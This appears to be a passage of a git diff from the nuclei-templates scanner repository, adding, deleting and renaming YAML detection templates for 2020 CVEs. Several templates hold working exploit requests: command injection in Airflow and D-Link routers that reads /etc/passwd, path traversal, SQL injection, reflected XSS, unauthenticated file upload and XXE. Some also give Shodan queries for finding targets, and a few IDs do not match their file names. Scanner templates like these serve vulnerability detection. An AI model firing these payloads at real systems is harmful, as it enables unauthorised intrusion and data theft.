Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. - reference: - - https://github.com/pberba/CVE-2020-11978 - - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - - https://twitter.com/wugeej/status/1400336603604668418 - - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-11978 - cwe-id: CWE-77 - metadata: - shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" - verified: "true" - tags: cve,cve2020,apache,airflow,rce,kev -requests: - - raw: - - | - GET /api/experimental/test HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | - GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | - POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"conf": {"message": "\"; touch test #"}} - - | - GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 - Host: {{Hostname}} - Accept: */* - extractors: - - type: regex - name: exec_date - part: body - group: 1 - internal: true - regex: - - '"execution_date":"([0-9-A-Z:+]+)"' - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_4, "operator":"BashOperator")' - - 'contains(all_headers_4, "application/json")' - condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-12271.yaml b/nuclei-templates/CVE-2020/CVE-2020-12271.yaml deleted file mode 100644 index 8056743a9a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12271.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: CVE-2020-12271 -info: - name: Sophos XG Firewall Pre-Auth SQL Injection - author: medbsq - severity: critical -#https://www.cvebase.com/cve/2020/12271 -requests: - - method: GET - path: - - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers: - - type: word - words: - - "loginstylesheet" - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml deleted file mode 100644 index 78077a5c24..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-12447 -info: - name: Onkyo TX-NR585 Web Interface - Directory Traversal - author: 0x_Akoko - severity: high - description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal - reference: - - https://blog.spookysec.net/onkyo-lfi - - https://www.cvedetails.com/cve/CVE-2020-12447 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-12447 - cwe-id: CWE-22 - tags: cve,cve2020,onkyo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml new file mode 100644 index 0000000000..38db107834 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-13121 +info: + name: Submitty 20.04.01 - Open redirect + author: 0x_Akoko + severity: medium + description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + reference: + - https://github.com/Submitty/Submitty/issues/5265 + - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13121 + cwe-id: CWE-601 +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml b/nuclei-templates/CVE-2020/CVE-2020-13405.yaml deleted file mode 100644 index 9aae1f9bf7..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-13405 -info: - name: MicroWeber - Unauthenticated User Database Disclosure - author: ritikchaddha,amit-jd - severity: high - description: | - The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. - reference: - - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 - - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13405 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"microweber" - verified: "true" - tags: cve,cve2020,microweber,unauth,disclosure -requests: - - raw: - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:modules/load_module:users - - module={{endpoint}} - payloads: - endpoint: - - "users/controller" - - "modules/users/controller" - - "/modules/users/controller" - matchers: - - type: dsl - dsl: - - 'contains(body,"username")' - - 'contains(body,"password")' - - 'contains(body,"password_reset_hash")' - - 'status_code==200' - - 'contains(all_headers,"text/html")' - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-14181.yaml b/nuclei-templates/CVE-2020/CVE-2020-14181.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14181.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14181.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml new file mode 100644 index 0000000000..36f102aa68 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-14408 +info: + name: Agentejo Cockpit 0.10.2 - Reflected XSS + author: edoardottt + severity: medium + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14408 + cwe-id: CWE-79 + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 + metadata: + verified: true + tags: cve,cve2022,cockpit,agentejo,xss,oss +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "redirectTo = '/92874';alert(document.domain)//280';" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-15129.yaml b/nuclei-templates/CVE-2020/CVE-2020-15129.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15129.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15129.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15500.yaml b/nuclei-templates/CVE-2020/CVE-2020-15500.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15500.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15500.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15505.yaml b/nuclei-templates/CVE-2020/CVE-2020-15505.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15505.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15505.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15568.yaml b/nuclei-templates/CVE-2020/CVE-2020-15568.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15568.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15568.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15920.yaml b/nuclei-templates/CVE-2020/CVE-2020-15920.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15920.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15920.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16270.yaml b/nuclei-templates/CVE-2020/CVE-2020-16270.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16270.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16270.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16846.yaml b/nuclei-templates/CVE-2020/CVE-2020-16846.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16846.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16846.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml new file mode 100644 index 0000000000..66a1295845 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml @@ -0,0 +1,59 @@ +id: cve-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + + # References: + # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/ + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16952.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16952.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17456.yaml b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17456.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17456.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17505.yaml b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17505.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17505.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17506.yaml b/nuclei-templates/CVE-2020/CVE-2020-17506.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17506.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17506.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-18268.yaml b/nuclei-templates/CVE-2020/CVE-2020-18268.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-18268.yaml rename to nuclei-templates/CVE-2020/CVE-2020-18268.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-19295.yaml b/nuclei-templates/CVE-2020/CVE-2020-19295.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-19295.yaml rename to nuclei-templates/CVE-2020/CVE-2020-19295.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/CVE-2020-1938.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1938.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1938.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1943.yaml b/nuclei-templates/CVE-2020/CVE-2020-1943.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1943.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1943.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-19625.yaml b/nuclei-templates/CVE-2020/CVE-2020-19625.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-19625.yaml rename to nuclei-templates/CVE-2020/CVE-2020-19625.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/CVE-2020-2103.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-2103.yaml rename to nuclei-templates/CVE-2020/CVE-2020-2103.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-2140.yaml b/nuclei-templates/CVE-2020/CVE-2020-2140.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-2140.yaml rename to nuclei-templates/CVE-2020/CVE-2020-2140.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml new file mode 100644 index 0000000000..a711842702 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-22211 +info: + name: 74cms - ajax_street.php 'key' SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + reference: + - https://github.com/blindkey/cve_like/issues/13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22210 + cwe-id: CWE-89 + metadata: + fofa-query: app="74cms" + shodan-query: http.html:"74cms" + tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" +requests: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + +# Enhanced by cs on 2022/06/21 diff --git a/nuclei-templates/CVE-2020/cve-2020-22840.yaml b/nuclei-templates/CVE-2020/CVE-2020-22840.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-22840.yaml rename to nuclei-templates/CVE-2020/CVE-2020-22840.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-23015.yaml b/nuclei-templates/CVE-2020/CVE-2020-23015.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-23015.yaml rename to nuclei-templates/CVE-2020/CVE-2020-23015.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml new file mode 100644 index 0000000000..d38bafb820 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-24589 + +info: + name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection + author: lethargynavigator + severity: critical + description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 + cve-id: CVE-2020-24589 + tags: cve,cve2020,wso2,xxe,oast,blind + +requests: + - raw: + - | + POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "Failed to install the generic artifact type" + +# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-24765.yaml b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-24765.yaml rename to nuclei-templates/CVE-2020/CVE-2020-24765.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-25495.yaml b/nuclei-templates/CVE-2020/CVE-2020-25495.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-25495.yaml rename to nuclei-templates/CVE-2020/CVE-2020-25495.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-25540.yaml b/nuclei-templates/CVE-2020/CVE-2020-25540.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-25540.yaml rename to nuclei-templates/CVE-2020/CVE-2020-25540.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26073.yaml b/nuclei-templates/CVE-2020/CVE-2020-26073.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26073.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26073.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26153.yaml b/nuclei-templates/CVE-2020/CVE-2020-26153.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26153.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26153.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26214.yaml b/nuclei-templates/CVE-2020/CVE-2020-26214.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26214.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26214.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-27866.yaml b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-27866.yaml rename to nuclei-templates/CVE-2020/CVE-2020-27866.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29227.yaml b/nuclei-templates/CVE-2020/CVE-2020-29227.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29227.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29227.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29395.yaml b/nuclei-templates/CVE-2020/CVE-2020-29395.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29395.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29395.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-29597.yaml b/nuclei-templates/CVE-2020/CVE-2020-29597.yaml new file mode 100644 index 0000000000..839ed954e9 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-29597.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-29597 +info: + name: IncomCMS 2.0 - Arbitrary File Upload + author: princechaddha + severity: critical + description: | + IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + reference: + - https://github.com/Trhackno/CVE-2020-29597 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 + - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md + - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-29597 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2020,incomcms,fileupload,intrusive +requests: + - raw: + - | + POST /incom/modules/uploader/showcase/script.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt + + ------WebKitFormBoundaryBEJZt0IK73M2mAbt + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" + Content-Type: text/html + + {{randstr_2}} + ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- + - | + GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '{"status":"1","name":"{{randstr_1}}.png"}' + - type: word + part: body_2 + words: + - '{{randstr_2}}' + +# Enhanced by CS 06/06/2022 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml b/nuclei-templates/CVE-2020/CVE-2020-35234.yaml deleted file mode 100644 index 36cb1b2d23..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2020-35234 - -info: - name: SMTP WP Plugin Directory Listing - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. - remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 - - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: cve,cve2020,wordpress,wp-plugin,smtp - classification: - cve-id: CVE-2020-35234 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" - - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/CVE-2020-35338.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35338.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35338.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35580.yaml b/nuclei-templates/CVE-2020/CVE-2020-35580.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35580.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35580.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35598.yaml b/nuclei-templates/CVE-2020/CVE-2020-35598.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35598.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35598.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35713.yaml b/nuclei-templates/CVE-2020/CVE-2020-35713.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35713.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35713.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35749.yaml b/nuclei-templates/CVE-2020/CVE-2020-35749.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35749.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35749.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35847.yaml b/nuclei-templates/CVE-2020/CVE-2020-35847.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35847.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35847.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-36287.yaml b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml new file mode 100644 index 0000000000..8e5e71f48c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-36287 +info: + name: Jira Dashboard Gadgets / Information Disclosure + author: Jafar_Abo_Nada + severity: medium + description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. + tags: cve,cve2020,jira,atlassian,disclosure + reference: | + - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 + - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 + # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs +requests: + - raw: + - | + GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + - | + GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_1, '')" + - "status_code_2 != 401" + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-36289.yaml b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-36289.yaml rename to nuclei-templates/CVE-2020/CVE-2020-36289.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5775.yaml b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5775.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5775.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5776.yaml b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5776.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5776.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5777.yaml b/nuclei-templates/CVE-2020/CVE-2020-5777.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5777.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5777.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5902.yaml b/nuclei-templates/CVE-2020/CVE-2020-5902.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5902.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5902.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6171.yaml b/nuclei-templates/CVE-2020/CVE-2020-6171.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6171.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6171.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7246.yaml b/nuclei-templates/CVE-2020/CVE-2020-7246.yaml deleted file mode 100644 index cafcede422..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7246.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2020-7246 -info: - name: qdPM Authenticated Remote Code Execution - author: medbsq - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}/qdPM/" - - "{{BaseURL}}/" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers: - - type: word - words: - - "qdPM 9." - part: body - # https://www.cvebase.com/cve/2020/7246 diff --git a/nuclei-templates/CVE-2020/cve-2020-8115.yaml b/nuclei-templates/CVE-2020/CVE-2020-8115.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8115.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8115.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8194.yaml b/nuclei-templates/CVE-2020/CVE-2020-8194.yaml similarity index 